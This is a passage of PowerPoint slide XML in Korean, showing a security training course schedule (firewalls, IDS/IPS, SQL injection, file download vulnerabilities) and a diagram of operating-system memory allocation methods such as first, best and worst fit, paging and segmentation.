                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="-90">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>시스템 및 네트워크 보안</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="0" spc="-9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사용자 인증 및 백신프로그램</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방화벽</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>, IDS, IPS, VPN</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700" kern="0" spc="-60">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>OCS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="700" kern="0" spc="-60">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>임관식</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="700" kern="0" spc="-60">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>(5.28(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="700" kern="0" spc="-60">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>금</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="700" kern="0" spc="-6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0500898"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="56491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방화벽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웹 구조 및 취약점</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4974341"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="40008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초빙강연</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사이버전에 대한 해군의 대비태세</a:t>
                      </a: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3456134"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="60463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SQL injection </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="8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800" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>공격 및 대응</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin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파일 다운로드 취약점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83529111"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="451176">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[6.7(</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11.(</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dirty="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7750826"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="그룹 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E27BD450-010C-4154-A0AC-79B94E39629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BB5D9A7C-3835-4F6E-9D49-06C2AC2BB5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8CCA404-9A49-47A6-8288-55541A1344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387F637-55A7-430C-8ED4-4E59C36BDE2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165920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매니저까지 있구나</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웹 페이지에서 사용하는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Memory management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어떤 종류의 알고리즘인가</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알고리즘 후보는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>다음 페이지</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>에 있음</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="10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관리 기능 의 종류에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00934344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683D76E7-C65C-438C-B942-CD324182FB08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2339831" y="2272819"/>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연속 할당 방식</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87ABF26D-356B-4E0E-8CC9-C8D88F6C157B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4402068" y="2272819"/>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메모리의 공간에 연속적으로 적재</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94851D5A-1255-4B37-A4F0-97F0A0B99FE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051849" y="1743862"/>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메모리 관리</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="연결선: 꺾임 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CE05DF6-89D8-4214-9C9F-34D70F82C32D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="21" idx="2"/>
            <a:endCxn id="16" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="2029363" y="2179190"/>
            <a:ext cx="312118" cy="30881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8340085-BB37-4A60-9BA6-437F9BF37F5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2339830" y="5192693"/>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err="1"/>
              <a:t>비연속</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t> 할당 방식</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52BA6F1D-576E-432E-A915-22C351652BCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4402068" y="5192693"/>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하나의 프로세스가 메모리의 공간에 분산되어 적재 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87F8BD96-F435-4D09-B1BA-360F628F45BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2937347" y="2801776"/>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고정 분할 방식</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="TextBox 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7343107B-FA56-4C3F-A131-ED91A42B976B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5008380" y="2801776"/>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하나의 프로세스 적재</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="TextBox 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFD5F5AF-325F-4CD5-92E3-CDCBF9B18391}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2937347" y="329973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가변 분할 방식</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83FFF3E2-0098-43F7-9607-7708F8DBBE13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5008380" y="3299738"/>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여러 개의 프로세스 적재</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="TextBox 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1BB74D5-70DB-450B-A097-FB4145959FFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3422904" y="3794934"/>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First Fit</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="TextBox 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A2B85F1-5000-4FD7-B940-9D592BED9337}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3422904" y="4228612"/>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Best Fit</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="TextBox 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA9BFC7E-EEFB-4D7C-8C02-478D6FEAB3E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3422903" y="4662290"/>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Worst Fit</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="TextBox 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95487B23-2CEA-4B7A-B955-7B5DD5B927E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5389296" y="3794934"/>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최초로 찾은 파티션에 적재</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="TextBox 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7418C37-639F-4FE1-A4AC-AD194AB155EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5389294" y="4230798"/>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작은 파티션에 적재</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="TextBox 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE9629E9-6BF7-42DE-9CE1-10434879C4FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5389294" y="4663935"/>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큰 파티션에 적재</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="TextBox 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2E4A98C-B2A3-45A9-9089-BC610C463A7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2937347" y="571614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Paging</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="TextBox 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F06144CC-5951-49D0-B2CF-843E64CA28C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2937346" y="6212664"/>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Segmentation</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="TextBox 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{825DEA76-E9C3-4472-AF52-CAD5A06DCCE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5008378" y="5715974"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="TextBox 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62A735DF-8A98-40A2-9B1D-8D7B7BADC72D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5008378" y="6223071"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="연결선: 꺾임 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8865ABEB-5FA9-43C6-BA69-30A58CE605D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="21" idx="2"/>
            <a:endCxn id="26" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="569425" y="3639127"/>
            <a:ext cx="3231992" cy="30881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D2AC4798-1811-4651-9FF0-3864DD408894}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:endCxn id="28" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2520594" y="2706497"/>
            <a:ext cx="416753" cy="312118"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 36408"/>
            </a:avLst>
          </a:prstGeom>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F7EF22B0-FF3A-410A-AB52-A39FF42957E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="2402880" y="2982110"/>
            <a:ext cx="804578" cy="26435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6" name="연결선: 꺾임 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1D0520F-B3E6-41CF-8CA5-9C40B7A88843}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="33" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3155895" y="3733415"/>
            <a:ext cx="267009" cy="246175"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 1609"/>
            </a:avLst>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="48" name="연결선: 꺾임 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C7DBF65-5EA6-4574-BE4C-A74DD58F6753}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="34" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="2957253" y="3947617"/>
            <a:ext cx="664292" cy="26701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F95F5937-57DF-4804-A38E-7D04F5011930}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="35" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3155903" y="3733422"/>
            <a:ext cx="267001" cy="111352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2305966C-BA7B-474C-BA4E-5CAFC2E5348C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="39" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2728971" y="5626371"/>
            <a:ext cx="208377" cy="30661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A10ED37B-20ED-4C8D-B2DF-85108B9D8DFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="40" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2728970" y="5653311"/>
            <a:ext cx="208376" cy="77619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9939D393-9089-4954-BB62-BCA12BC42C77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="2013265" y="2181779"/>
            <a:ext cx="312118" cy="308818"/>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1EC32A06-3F2B-479E-90B1-3B9E580803D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051848" y="1739944"/>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직사각형 68">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{703ECABE-01DC-4A85-894B-D0B501B7843B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2328924" y="2288373"/>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2" name="연결선: 꺾임 71">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2586B592-35F6-4E4C-87B9-D161032063BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="2411759" y="2980366"/>
            <a:ext cx="781627" cy="259165"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 1008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3" name="직사각형 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BB5FD09-A19A-4C0D-904D-FAC174B6CBB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2937346" y="3296889"/>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7" name="연결선: 꺾임 76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7051B651-06B3-46BE-84B6-7BC2309FCE68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="2961996" y="3946682"/>
            <a:ext cx="654807" cy="267010"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 99821"/>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8" name="직사각형 77">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8B6952E-652E-40C8-95EF-935E54B337DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3415059" y="4232689"/>
            <a:ext cx="1893315" cy="376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0444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wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="67"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="22" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="500"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="69"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="72"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
